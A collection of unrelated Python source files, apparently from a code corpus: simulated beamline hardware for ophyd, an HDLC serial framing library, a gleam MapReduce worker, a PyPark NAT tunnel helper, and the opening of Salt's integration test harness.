pseudo3 = Cpt(PseudoSingle, limits=None, egu='c', kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
sig = Cpt(Signal, value=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo2,
real3=-pseudo_pos.pseudo3)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1,
pseudo2=-real_pos.real2,
pseudo3=-real_pos.real3)
class SPseudo1x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo1,
real3=-pseudo_pos.pseudo1)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1)
class SynAxisNoPosition(SynAxis):
@property
def position(self):
raise AttributeError
def make_fake_device(cls):
"""
Inspect cls and construct a fake device that has the same structure.
This works by replacing EpicsSignal with FakeEpicsSignal and EpicsSignalRO
with FakeEpicsSignalRO. The fake class will be a subclass of the real
class.
This assumes that EPICS connections are done entirely in EpicsSignal and
EpicsSignalRO subcomponents. If this is not true, this will fail silently
on class construction and loudly when manipulating an object.
Parameters
----------
cls : Device
A real Device class to inspect and create a fake Device class from
Returns
-------
fake_device : Device
The resulting fake Device class
"""
# Cache to avoid repeating work.
# EpicsSignal and EpicsSignalRO begin in the cache.
if cls not in fake_device_cache:
if not issubclass(cls, Device):
# Ignore non-devices and non-epics-signals
logger.debug('Ignore cls=%s, bases are %s', cls, cls.__bases__)
fake_device_cache[cls] = cls
return cls
fake_dict = {}
# Update all the components recursively
for cpt_name in cls.component_names:
cpt = getattr(cls, cpt_name)
if isinstance(cpt, DDCpt):
# Make a regular Cpt out of the DDC, as it already has
# been generated
fake_cpt = Cpt(cls=cpt.cls, suffix=cpt.suffix,
lazy=cpt.lazy,
trigger_value=cpt.trigger_value,
kind=cpt.kind, add_prefix=cpt.add_prefix,
doc=cpt.doc, **cpt.kwargs,
)
else:
fake_cpt = copy.copy(cpt)
fake_cpt.cls = make_fake_device(cpt.cls)
logger.debug('switch cpt_name=%s to cls=%s', cpt_name,
fake_cpt.cls)
fake_dict[cpt_name] = fake_cpt
fake_class = type('Fake{}'.format(cls.__name__), (cls,), fake_dict)
fake_device_cache[cls] = fake_class
logger.debug('fake_device_cache[%s] = %s', cls, fake_class)
return fake_device_cache[cls]
def clear_fake_device(dev, *, default_value=0, default_string_value='',
ignore_exceptions=False):
'''Clear a fake device by setting all signals to a specific value
Parameters
----------
dev : Device
The fake device
default_value : any, optional
The value to put to non-string components
default_string_value : any, optional
The value to put to components determined to be strings
ignore_exceptions : bool, optional
Ignore any exceptions raised by `sim_put`
Returns
-------
all_values : list
List of all (signal_instance, value) that were set
'''
all_values = []
for walk in dev.walk_signals(include_lazy=True):
sig = walk.item
if not hasattr(sig, 'sim_put'):
continue
try:
string = getattr(sig, 'as_string', False)
value = (default_string_value
if string
else default_value)
sig.sim_put(value)
except Exception:
if not ignore_exceptions:
raise
else:
all_values.append((sig, value))
return all_values
def instantiate_fake_device(dev_cls, *, name=None, prefix='_prefix',
**specified_kw):
'''Instantiate a fake device, optionally specifying some initializer kwargs
If unspecified, all initializer keyword arguments will default to the
string f"_{argument_name}_".
Parameters
----------
dev_cls : class
The device class to instantiate. This is allowed to be a regular
device, as `make_fake_device` will be called on it first.
name : str, optional
The instantiated device name
prefix : str, optional
The instantiated device prefix
**specified_kw :
Keyword arguments to override with a specific value
Returns
-------
dev : dev_cls instance
The instantiated fake device
'''
dev_cls = make_fake_device(dev_cls)
sig = inspect.signature(dev_cls)
ignore_kw = {'kind', 'read_attrs', 'configuration_attrs', 'parent',
'args', 'name', 'prefix'}
def get_kwarg(name, param):
default = param.default
if default == param.empty:
# NOTE: could check param.annotation here
default = '_{}_'.format(param.name)
return specified_kw.get(name, default)
kwargs = {name: get_kwarg(name, param)
for name, param in sig.parameters.items()
if param.kind != param.VAR_KEYWORD and
name not in ignore_kw
}
kwargs['name'] = (name if name is not None else dev_cls.__name__)
kwargs['prefix'] = prefix
return dev_cls(**kwargs)
class FakeEpicsSignal(SynSignal):
"""
Fake version of EpicsSignal that's really just a SynSignal.
Wheras SynSignal is generally used to test plans, FakeEpicsSignal is
generally used in conjunction with make_fake_device to test any logic
inside of a Device subclass.
Unlike in SynSignal, this class is generally instantiated inside of a
subcomponent generated automatically by make_fake_device. This means we
need extra hooks for modifying the signal's properties after the class
instantiates.
We can emulate EpicsSignal features here. We currently emulate the put
limits and some enum handling.
"""
def __init__(self, read_pv, write_pv=None, *, put_complete=False,
string=False, limits=False, auto_monitor=False, name=None,
**kwargs):
"""
Mimic EpicsSignal signature
"""
self.as_string = string
self._enum_strs = None
super().__init__(name=name, **kwargs)
self._use_limits = limits
self._put_func = None
self._limits = None
self._metadata.update(
connected=True,
)
def describe(self):
desc = super().describe()
if self._enum_strs is not None:
desc[self.name]['enum_strs'] = self.enum_strs
return desc
def sim_set_putter(self, putter):
"""
Define arbirary behavior on signal put.
This can be used to emulate basic IOC behavior.
"""
self._put_func = putter
def get(self, *, as_string=None, connection_timeout=1.0, **kwargs):
"""
Implement getting as enum strings
"""
if as_string is None:
as_string = self.as_string
value = super().get()
if as_string:
if self.enum_strs is not None and isinstance(value, int):
return self.enum_strs[value]
elif value is not None:
return str(value)
return value
def put(self, value, *args, **kwargs):
"""
Implement putting as enum strings and put functions
"""
if self.enum_strs is not None:
if value in self.enum_strs:
value = self.enum_strs.index(value)
elif isinstance(value, str):
err = '{} not in enum strs {}'.format(value, self.enum_strs)
raise ValueError(err)
if self._put_func is not None:
return self._put_func(value, *args, **kwargs)
return super().put(value, *args, **kwargs)
def sim_put(self, *args, **kwargs):
"""
Update the read-only signal's value.
Implement here instead of FakeEpicsSignalRO so you can call it with
every fake signal.
"""
force = kwargs.pop('force', True)
# The following will emit SUB_VALUE:
ret = Signal.put(self, *args, force=force, **kwargs)
# Also, ensure that SUB_META has been emitted:
self._run_subs(sub_type=self.SUB_META, **self._metadata)
return ret
@property
def enum_strs(self):
"""
Simulated enum strings.
Use sim_set_enum_strs during setup to set the enum strs.
"""
return self._enum_strs
def sim_set_enum_strs(self, enums):
"""
Set the enum_strs for a fake device
Parameters
----------
enums: list or tuple of str
The enums will be accessed by array index, e.g. the first item in
enums will be 0, the next will be 1, etc.
"""
self._enum_strs = tuple(enums)
self._metadata['enum_strs'] = tuple(enums)
self._run_subs(sub_type=self.SUB_META, **self._metadata)
@property
def limits(self):
return self._limits
def sim_set_limits(self, limits):
"""
Set the fake signal's limits.
"""
self._limits = limits
def check_value(self, value):
"""
Implement some of the checks from EpicsSignal
"""
super().check_value(value)
if value is None:
raise ValueError('Cannot write None to EPICS PVs')
if self._use_limits and not self.limits[0] <= value <= self.limits[1]:
raise LimitError(f'value={value} not within limits {self.limits}')
class FakeEpicsSignalRO(SynSignalRO, FakeEpicsSignal):
"""
Read-only FakeEpicsSignal
"""
pass
class FakeEpicsSignalWithRBV(FakeEpicsSignal):
"""
FakeEpicsSignal with PV and PV_RBV; used in the AreaDetector PV naming
scheme
"""
def __init__(self, prefix, **kwargs):
super().__init__(prefix + '_RBV', write_pv=prefix, **kwargs)
fake_device_cache = {EpicsSignal: FakeEpicsSignal,
EpicsSignalRO: FakeEpicsSignalRO,
EpicsSignalWithRBV: FakeEpicsSignalWithRBV,
}
class DirectImage(Device):
img = Cpt(SynSignal, kind='hinted')
def __init__(self, *args, func=None, **kwargs):
super().__init__(*args, **kwargs)
if func is not None:
self.img.sim_set_func(func)
def trigger(self):
return self.img.trigger()
def hw(save_path=None):
"Build a set of synthetic hardware (hence the abbreviated name, hw)"
motor = SynAxis(name='motor', labels={'motors'})
motor1 = SynAxis(name='motor1', labels={'motors'})
motor2 = SynAxis(name='motor2', labels={'motors'})
motor3 = SynAxis(name='motor3', labels={'motors'})
jittery_motor1 = SynAxis(name='jittery_motor1',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
jittery_motor2 = SynAxis(name='jittery_motor2',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
noisy_det = SynGauss('noisy_det', motor, 'motor', center=0, Imax=1,
noise='uniform', sigma=1, noise_multiplier=0.1,
labels={'detectors'})
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
identical_det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
det1 = SynGauss('det1', motor1, 'motor1', center=0, Imax=5, sigma=0.5,
labels={'detectors'})
det2 = SynGauss('det2', motor2, 'motor2', center=1, Imax=2, sigma=2,
labels={'detectors'})
det3 = SynGauss('det3', motor3, 'motor3', center=-1, Imax=2, sigma=1,
labels={'detectors'})
det4 = Syn2DGauss('det4', motor1, 'motor1', motor2, 'motor2',
center=(0, 0), Imax=1, labels={'detectors'})
det5 = Syn2DGauss('det5', jittery_motor1, 'jittery_motor1', jittery_motor2,
'jittery_motor2', center=(0, 0), Imax=1,
labels={'detectors'})
flyer1 = MockFlyer('flyer1', det, motor, 1, 5, 20)
flyer2 = MockFlyer('flyer2', det, motor, 1, 5, 10)
trivial_flyer = TrivialFlyer()
new_trivial_flyer = NewTrivialFlyer()
ab_det = ABDetector(name='det', labels={'detectors'})
# area detector that directly stores image data in Event
direct_img = DirectImage(func=lambda: np.array(np.ones((10, 10))),
name='direct', labels={'detectors'})
direct_img.img.name = 'img'
direct_img_list = DirectImage(func=lambda: [[1] * 10] * 10,
name='direct', labels={'detectors'})
direct_img_list.img.name = 'direct_img_list'
# area detector that stores data in a file
img = SynSignalWithRegistry(func=lambda: np.array(np.ones((10, 10))),
name='img', labels={'detectors'},
save_path=save_path)
invariant1 = InvariantSignal(func=lambda: 0, name='invariant1',
labels={'detectors'})
invariant2 = InvariantSignal(func=lambda: 0, name='invariant2',
labels={'detectors'})
det_with_conf = DetWithConf(name='det', labels={'detectors'})
det_with_count_time = DetWithCountTime(name='det', labels={'detectors'})
rand = SynPeriodicSignal(name='rand', labels={'detectors'})
rand2 = SynPeriodicSignal(name='rand2', labels={'detectors'})
motor_no_pos = SynAxisNoPosition(name='motor', labels={'motors'})
bool_sig = Signal(value=False, name='bool_sig', labels={'detectors'})
motor_empty_hints1 = SynAxisEmptyHints(name='motor1', labels={'motors'})
motor_empty_hints2 = SynAxisEmptyHints(name='motor2', labels={'motors'})
motor_no_hints1 = SynAxisNoHints(name='motor1', labels={'motors'})
motor_no_hints2 = SynAxisNoHints(name='motor2', labels={'motors'})
# Because some of these reference one another we must define them (above)
# before we pack them into a namespace (below).
signal = SynSignal(name='signal')
return SimpleNamespace(
motor=motor,
motor1=motor1,
motor2=motor2,
motor3=motor3,
jittery_motor1=jittery_motor1,
jittery_motor2=jittery_motor2,
noisy_det=noisy_det,
det=det,
identical_det=identical_det,
det1=det1,
det2=det2,
det3=det3,
det4=det4,
det5=det5,
flyer1=flyer1,
flyer2=flyer2,
trivial_flyer=trivial_flyer,
new_trivial_flyer=new_trivial_flyer,
ab_det=ab_det,
direct_img=direct_img,
direct_img_list=direct_img_list,
img=img,
invariant1=invariant1,
invariant2=invariant2,
pseudo3x3=SPseudo3x3(name='pseudo3x3'),
pseudo1x3=SPseudo1x3(name='pseudo1x3'),
sig=Signal(name='sig', value=0),
det_with_conf=det_with_conf,
det_with_count_time=det_with_count_time,
rand=rand,
rand2=rand2,
motor_no_pos=motor_no_pos,
motor_empty_hints1=motor_empty_hints1,
motor_empty_hints2=motor_empty_hints2,
motor_no_hints1=motor_no_hints1,
motor_no_hints2=motor_no_hints2,
bool_sig=bool_sig,
signal=signal,
)
# Dump instances of the example hardware generated by hw() into the global
# namespcae for convenience and back-compat.
globals().update(hw().__dict__)
|
SimpleHDLC.py
|
#!/usr/bin/python
# coding: utf8
__version__ = '0.2'
import logging
import struct
import time
from threading import Thread
from PyCRC.CRCCCITT import CRCCCITT
import sys
logger = logging.getLogger(__name__)
def calcCRC(data):
crc = CRCCCITT("FFFF").calculate(bytes(data))
b = bytearray(struct.pack(">H", crc))
return b
class Frame(object):
STATE_READ = 0x01
STATE_ESCAPE = 0x02
def __init__(self):
self.finished = False
self.error = False
self.state = self.STATE_READ
self.data = bytearray()
self.crc = bytearray()
self.reader = None
def __len__(self):
return len(self.data)
def addByte(self, b):
if b == 0x7D:
self.state = self.STATE_ESCAPE
elif self.state == self.STATE_ESCAPE:
self.state = self.STATE_READ
b = b ^ 0x20
self.data.append(b)
else:
self.data.append(b)
def finish(self):
self.crc = self.data[-2:]
self.data = self.data[:-2]
self.finished = True
def checkCRC(self):
res = bool(self.crc == calcCRC(self.data))
if not res:
logger.warning(f"invalid crc {self.crc} != {calcCRC(self.data)}")
self.error = True
return res
def toString(self):
return self.data.decode('utf-8').rstrip('\0')
class HDLC(object):
def __init__(self, serial, dumpFile=None):
self.serial = serial
self.current_frame = None
self.last_frame = None
self.frame_callback = None
self.error_callback = None
self.running = False
self.dumpFile = dumpFile
@classmethod
def toBytes(cls, data):
return bytearray(data)
def sendFrame(self, data):
bs = self._encode(self.toBytes(data))
# logger.info("Sending Frame: %d", len(data))
res = self.serial.write(bs)
# logger.info("Send %s bytes", res)
def _onFrame(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
# logger.info("Received Frame: %d %s", len(s), s[:20])
if self.frame_callback is not None:
self.frame_callback(s)
def _onError(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.warning("Frame Error: %d %s", len(s), s[:20])
if self.error_callback is not None:
self.error_callback(s)
def _readBytesAndProc(self, size):
b = bytearray(self.serial.read(size))
if self.dumpFile is not None:
self.dumpFile.write(b)
for i in range(len(b)):
self._readByteAndProc(b[i])
def _readByteAndProc(self, b):
assert 0 <= b <= 255
if b == 0x7E:
# Start or End
if not self.current_frame or len(self.current_frame) < 1:
# Start
self.current_frame = Frame()
else:
# End
self.current_frame.finish()
self.current_frame.checkCRC()
elif self.current_frame is None:
# Ignore before Start
return False
elif not self.current_frame.finished:
self.current_frame.addByte(b)
else:
# Ignore Bytes
pass
# Validate and return
if self.current_frame.finished and not self.current_frame.error:
# Success
self._onFrame(self.current_frame)
self.current_frame = None
return True
elif self.current_frame.finished:
# Error
self._onError(self.current_frame)
self.current_frame = None
return True
return False
# def readFrame(self, timeout=5):
# timer = time.time() + timeout
# while time.time() < timer:
# i = self.serial.in_waiting
# if i < 1:
# time.sleep(0.0001)
# continue
# res = self._readBytes(i)
# if res:
# # Validate and return
# if not self.last_frame.error:
# # Success
# s = self.last_frame.toString()
# return s
# elif self.last_frame.finished:
# # Error
# raise ValueError("Invalid Frame (CRC FAIL)")
# raise RuntimeError("readFrame timeout")
@classmethod
def _encode(cls, bs):
data = bytearray()
data.append(0x7E)
crc = calcCRC(bs)
bs = bs + crc
for byte in bs:
if byte == 0x7E or byte == 0x7D:
data.append(0x7D)
data.append(byte ^ 0x20)
else:
data.append(byte)
data.append(0x7E)
return bytes(data)
def _receiveLoop(self):
while self.running:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.001)
# print(".", end="")
# sys.stdout.flush()
continue
self._readBytesAndProc(i)
def startReader(self, onFrame, onError=None):
if self.running:
raise RuntimeError("reader already running")
self.reader = Thread(target=self._receiveLoop)
self.reader.setDaemon(True)
self.frame_callback = onFrame
self.error_callback = onError
self.running = True
self.reader.start()
def stopReader(self):
self.running = False
try:
self.reader.join()
except:
pass
self.reader = None
|
mapreduce.py
|
import sys
import mrutil
import argparse
import threading
from time import sleep
import grpc
import gleam_pb2
import gleam_pb2_grpc
parser = argparse.ArgumentParser(description="mapreduce args")
parser.add_argument('--pymodule', '-module', required=True, type=str, help='python mapreduce module file')
group = parser.add_mutually_exclusive_group()
group.add_argument('--pymapper', '-mapper', type=str, help='map function')
group.add_argument("--pyreducer", '-reducer', type=str, help='reduce function')
parser.add_argument('--keyFields', '-keyFields', type=str, help='reduce keyFields')
parser.add_argument('--executor', '-gleam.executor')
parser.add_argument('--hashcode', '-flow.hashcode')
parser.add_argument('--stepId', '-flow.stepId')
parser.add_argument('--taskId', '-flow.taskId')
args = parser.parse_args()
def reportStat(stoppingReport, finishedReport):
lastRound = False
while True:
exeStat = gleam_pb2.ExecutionStat()
exeStat.flowHashCode = int(args.hashcode)
stat = exeStat.stats.add()
stat.stepId = int(args.stepId)
stat.taskId = int(args.taskId)
stat.inputCounter = mrutil.InputCounter
stat.outputCounter = mrutil.OutputCounter
yield exeStat
if(lastRound):
break
stoppingReport.wait(timeout=1.0)
if(stoppingReport.isSet()):
lastRound = True
def reportMain(stoppingReport, finishedReport):
with grpc.insecure_channel(args.executor) as channel:
stub = gleam_pb2_grpc.GleamExecutorStub(channel)
# get report stream iterator
statIter = reportStat(stoppingReport, finishedReport)
stub.CollectExecutionStatistics(statIter)
finishedReport.set()
def getUserMapper():
if(args.pymapper == None):
return None
else:
module = __import__(args.pymodule)
f = getattr(module, args.pymapper)
return f
def getUserReducer():
if(args.pyreducer == None):
return None, None
else:
# get reducer
module = __import__(args.pymodule)
f = getattr(module, args.pyreducer)
# get reduce keyindexes
keyIndexes = []
keyFields = args.keyFields.split(',')
for index in keyFields:
keyIndexes.append(int(index))
# mrutil.writeLogObject(keyIndexes)
return f, keyIndexes
def mainMapReduce():
# start report thread
stoppingReport = threading.Event()
finishedReport = threading.Event()
t = threading.Thread(target=reportMain, args=(stoppingReport, finishedReport))
t.start()
# start mapreduce in main
if(args.pymapper != None):
mapMain()
elif(args.pyreducer != None):
reduceMain()
else:
mrutil.writeError("python mapper or reducer do not specify\n")
# stop report notify
stoppingReport.set()
# wait report stopped
finishedReport.wait()
def useKeys(keyValues, keyIndexes):
if(len(keyValues) < len(keyIndexes)):
mrutil.writeError("python reduce keyindexes > keyvalues\n")
return None, None
keys = []
values = []
used = []
for i in range(len(keyValues)):
used.append(False)
for pos in keyIndexes:
# key pos start from 1
keys.append(keyValues[pos-1])
used[pos-1] = True
for i, kv in enumerate(keyValues):
if(not used[i]):
values.append(kv)
return keys, values
def getTsKeyValues(kvdict):
ts = 0
kvList = []
if kvdict.get('K__slc'):
for key in kvdict['K__slc']:
kvList.append(key)
if kvdict.get('V__slc'):
for val in kvdict['V__slc']:
kvList.append(val)
if kvdict.get('T__i64'):
ts = kvdict['T__i64']
return ts, kvList
def getKeyValues(kvdict):
kvList = []
if kvdict.get('K__slc'):
for key in kvdict['K__slc']:
kvList.append(key)
if kvdict.get('V__slc'):
for val in kvdict['V__slc']:
kvList.append(val)
return kvList
def reduce(f, x, y):
if(len(x) == 1 and len(y) == 1):
return [f(x[0], y[0])]
else:
kvList = f(x, y)
return kvList
def doProcessReducer(f):
kvdict = mrutil.readRow()
if kvdict == None:
# mrutil.writeError("python reducer input row error\n")
return
mrutil.inputCounterInc()
lastTs, lastKvList = getTsKeyValues(kvdict)
while True:
kvdict = mrutil.readRow()
if kvdict == None:
break
mrutil.inputCounterInc()
ts, kvList = getTsKeyValues(kvdict)
lastVList = reduce(f, lastKvList, kvList)
lastKList = kvList
if(ts > lastTs):
lastTs = ts
mrutil.tsWriteRow(lastTs, lastKList, lastVList)
def doProcessReducerByKeys(f, keyIndexes):
kvdict = mrutil.readRow()
if kvdict == None:
# mrutil.writeError("python reducerByKeys input row error\n")
return
mrutil.inputCounterInc()
lastTs, lastKvList = getTsKeyValues(kvdict)
lastKList, lastVList = useKeys(lastKvList, keyIndexes)
while True:
kvdict = mrutil.readRow()
if kvdict == None:
return
mrutil.inputCounterInc()
ts, kvList = getTsKeyValues(kvdict)
kList, vList = useKeys(kvList, keyIndexes)
if(mrutil.compare(lastKList, kList)):
lastVList = reduce(f, lastVList, vList)
else:
mrutil.tsWriteRow(lastTs, lastKList, lastVList)
lastKList, lastVList = kList, vList
if(ts > lastTs):
lastTs = ts
def reduceMain():
f, keyIndexes = getUserReducer()
if(f == None or keyIndexes == None):
mrutil.writeError("python reducer not found\n")
return
else:
# mrutil.writeLogObject(keyIndexes)
if(len(keyIndexes) == 1 and keyIndexes[0] == 0):
return doProcessReducer(f)
else:
return doProcessReducerByKeys(f, keyIndexes)
def mapMain():
f = getUserMapper()
if f == None:
mrutil.writeError("python get mapper fail\n")
return
while True:
kvdict = mrutil.readRow()
if kvdict == None:
return
mrutil.inputCounterInc()
kvList = getKeyValues(kvdict)
if(kvList != None):
f(kvList)
else:
mrutil.writeError("python map get bad row\n")
return
mainMapReduce()
|
master.py
|
import logging
from multiprocessing import Process
from PyPark.result import Result
from PyPark.shootback.master import run_master
from PyPark.util.net import get_random_port
def addNat(data):
from PyPark.park import NAT_IP,NAT_PORT_MAP
nat_port = int(data['nat_port'])
target_addr = data['target_addr']
np = NAT_PORT_MAP.get(nat_port, None)
if np is None:
logging.info("===========增加NAT===================")
data_port = data.get("data_port", None)
if data_port is None:
data_port = get_random_port(ip=NAT_IP)
communicate_addr = ("0.0.0.0", data_port)
customer_listen_addr = ("0.0.0.0", nat_port)
secret_key = data["secret_key"]
process = Process(target=run_master, args=(communicate_addr, customer_listen_addr, secret_key))
process.start()
NAT_PORT_MAP[nat_port] = {
"process_pid": process.pid,
"secret_key": secret_key,
"data_port": data_port,
"target_addr": target_addr,
}
data["nat_port"] = nat_port
data["master_ip"] = NAT_IP
data["data_port"] = data_port
print("addNat", data)
logging.info(f"===========增加NAT nat_port:{nat_port}======data_port:{data_port}=============")
return Result.success(data=data)
data["nat_port"] = nat_port
data["master_ip"] = NAT_IP
data["data_port"] = np["data_port"]
data["secret_key"] = np["secret_key"]
return Result.success(data=data)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
import salt
import salt.config
import salt.log.setup as salt_log_setup
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
from salt.exceptions import SaltClientError
from salt.ext import six
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.helpers import RedirectStdStreams, requires_sshd_server
from tests.support.mixins import (
AdaptedConfigurationTestCaseMixin,
CheckShellBinaryNameAndVersionMixin,
SaltClientTestCaseMixin,
SaltMinionEventAssertsMixin,
SaltReturnAssertsMixin,
ShellCaseCommonTestsMixin,
)
from tests.support.parser import PNUM, SaltTestcaseParser, print_header
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase
try:
import pwd
except ImportError:
pass
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = salt.utils.msgpack.Unpacker(encoding="utf-8")
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == "tcp":
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
